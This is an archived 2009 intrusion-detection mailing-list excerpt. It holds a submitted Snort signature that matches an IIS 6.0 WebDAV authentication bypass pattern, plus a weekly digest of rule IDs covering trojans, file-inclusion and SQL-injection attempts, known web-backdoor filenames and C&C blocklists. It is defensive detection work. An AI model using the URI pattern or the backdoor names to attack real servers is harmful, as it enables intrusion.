        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500145 || ET COMPROMISED Known Compromised or Hostile Host Traffic (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500146 || ET COMPROMISED Known Compromised or Hostile Host Traffic (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500147 || ET COMPROMISED Known Compromised or Hostile Host Traffic (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500148 || ET COMPROMISED Known Compromised or Hostile Host Traffic (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500149 || ET COMPROMISED Known Compromised or Hostile Host Traffic (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500150 || ET COMPROMISED Known Compromised or Hostile Host Traffic (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500151 || ET COMPROMISED Known Compromised or Hostile Host Traffic (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500152 || ET COMPROMISED Known Compromised or Hostile Host Traffic (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510145 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510146 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510147 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510148 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510149 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510150 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510151 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510152 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From randolphdavidn at gmail.com  Sat May 16 17:13:08 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Sat, 16 May 2009 17:13:08 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
Message-ID: <d48bb4250905161413v4aa0bd0ftf4df5ee70545c508@mail.gmail.com>

I'm submitting this for the recent IIS 6.0 vulnerability
http://isc.sans.org/diary.html?storyid=6397

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
sid:xxxxxx; gid:1; rev:1;)

I also read that "translate: f" was required but the information on
milw0rm.com did not use that in all 3 examples.

From emerging at emergingthreats.net  Sat May 16 18:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 16 May 2009 18:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090516220010.BB5A24504B@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sat May 16 18:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2002920 - ET POLICY VNC Authentication Failure (emerging-policy.rules)
 2002922 - ET POLICY VNC Authentication Successful (emerging-policy.rules)
 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
 2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)
 2009347 - ET TROJAN Tigger.a/Syzor Checkin (emerging-virus.rules)
 2009348 - ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan (emerging.rules)
 2009349 - ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity (emerging-virus.rules)
 2009350 - ET TROJAN Win32.Hupigon Control Server Response (emerging-virus.rules)
 2009351 - ET TROJAN Urlzone/Bebloh Communication with Controller (emerging-virus.rules)


[///]     Modified active rules:     [///]

 2001621 - ET WEB Exploit Suspected PHP Injection Attack (emerging-web_sql_injection.rules)
 2001810 - ET WEB Explit PHP remote file include exploit attempt (emerging-web_sql_injection.rules)
 2002838 - ET WEB_SPECIFIC Google Search Appliance browsing the Internet (emerging-web_sql_injection.rules)
 2002849 - ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet (emerging-web_sql_injection.rules)
 2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
 2007611 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 (emerging-virus.rules)
 2007612 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 (emerging-virus.rules)
 2007613 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 (emerging-virus.rules)
 2007614 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 (emerging-virus.rules)
 2007950 - ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body (emerging-virus.rules)
 2008142 - ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) (emerging-virus.rules)
 2008189 - ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin (emerging-virus.rules)
 2008278 - ET TROJAN Generic Raider Obfuscated VBScript (emerging-virus.rules)
 2008379 - ET TROJAN Swizzor Checkin (kgen_up) (emerging-virus.rules)
 2008973 - ET TROJAN onmuz.com Infection Activity (emerging-virus.rules)
 2009126 - ET TROJAN Possible bot C&C Checkin (emerging-virus.rules)
 2009156 - ET TROJAN Unknown Dropper Checkin (emerging-virus.rules)
 2009306 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009307 - ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009308 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009309 - ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009310 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009311 - ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009312 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009313 - ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009314 - ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete (emerging-web.rules)
 2009315 - ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite (emerging-web.rules)
 2009316 - ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009317 - ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009318 - ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009319 - ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection (emerging-web_sql_injection.rules)
 2009320 - ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion (emerging-web_sql_injection.rules)
 2009321 - ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion (emerging-web_sql_injection.rules)
 2009322 - ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution (emerging-web.rules)
 2009323 - ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009324 - ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009325 - ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009326 - ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009327 - ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion (emerging-web_sql_injection.rules)
 2009328 - ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution (emerging-web.rules)
 2009329 - ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009330 - ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion (emerging-web_sql_injection.rules)
 2009331 - ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion (emerging-web_sql_injection.rules)
 2009332 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion (emerging-web_sql_injection.rules)
 2009333 - ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion (emerging-web_sql_injection.rules)
 2009334 - ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite (emerging-web.rules)
 2009335 - ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection (emerging-web_sql_injection.rules)
 2009336 - ET WEB Possible Web Backdoor cfexec.cfm access (emerging-web.rules)
 2009337 - ET WEB Possible Web Backdoor cmdasp.asp access (emerging-web.rules)
 2009338 - ET WEB Possible Web Backdoor cmdasp.aspx access (emerging-web.rules)
 2009339 - ET WEB Possible Web Backdoor simple-backdoor.php access (emerging-web.rules)
 2009340 - ET WEB Possible Web Backdoor php-backdoor.php access (emerging-web.rules)
 2009341 - ET WEB Possible Web Backdoor jsp-reverse.jsp access (emerging-web.rules)
 2009342 - ET WEB Possible Web Backdoor perlcmd.cgi access (emerging-web.rules)
 2009343 - ET WEB Possible Web Backdoor cmdjsp.jsp access (emerging-web.rules)
 2009344 - ET WEB Possible Web Backdoor cmd-asp-5.1.asp access (emerging-web.rules)
 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2400008 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules)
 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2401008 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules)
 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
 2404000 - ET DROP Known Bot C&C Server Traffic (group 1)  (emerging-botcc.rules)
 2404001 - ET DROP Known Bot C&C Server Traffic (group 2)  (emerging-botcc.rules)
 2404002 - ET DROP Known Bot C&C Server Traffic (group 3)  (emerging-botcc.rules)
 2404003 - ET DROP Known Bot C&C Server Traffic (group 4)  (emerging-botcc.rules)
 2404004 - ET DROP Known Bot C&C Server Traffic (group 5)  (emerging-botcc.rules)
 2404005 - ET DROP Known Bot C&C Server Traffic (group 6)  (emerging-botcc.rules)
 2404006 - ET DROP Known Bot C&C Server Traffic (group 7)  (emerging-botcc.rules)
 2404007 - ET DROP Known Bot C&C Server Traffic (group 8)  (emerging-botcc.rules)
 2404008 - ET DROP Known Bot C&C Server Traffic (group 9)  (emerging-botcc.rules)
 2404009 - ET DROP Known Bot C&C Server Traffic (group 10)  (emerging-botcc.rules)
 2404010 - ET DROP Known Bot C&C Server Traffic (group 11)  (emerging-botcc.rules)
 2404011 - ET DROP Known Bot C&C Server Traffic (group 12)  (emerging-botcc.rules)
 2404012 - ET DROP Known Bot C&C Server Traffic (group 13)  (emerging-botcc.rules)
 2404013 - ET DROP Known Bot C&C Server Traffic (group 14)  (emerging-botcc.rules)
 2404014 - ET DROP Known Bot C&C Server Traffic (group 15)  (emerging-botcc.rules)
 2404015 - ET DROP Known Bot C&C Server Traffic (group 16)  (emerging-botcc.rules)
 2404016 - ET DROP Known Bot C&C Server Traffic (group 17)  (emerging-botcc.rules)
 2404017 - ET DROP Known Bot C&C Server Traffic (group 18)  (emerging-botcc.rules)
 2404018 - ET DROP Known Bot C&C Server Traffic (group 19)  (emerging-botcc.rules)
 2404019 - ET DROP Known Bot C&C Server Traffic (group 20)  (emerging-botcc.rules)
 2404020 - ET DROP Known Bot C&C Server Traffic (group 21)  (emerging-botcc.rules)
 2404021 - ET DROP Known Bot C&C Server Traffic (group 22)  (emerging-botcc.rules)
 2404022 - ET DROP Known Bot C&C Server Traffic (group 23)  (emerging-botcc.rules)
 2404023 - ET DROP Known Bot C&C Server Traffic (group 24)  (emerging-botcc.rules)
 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
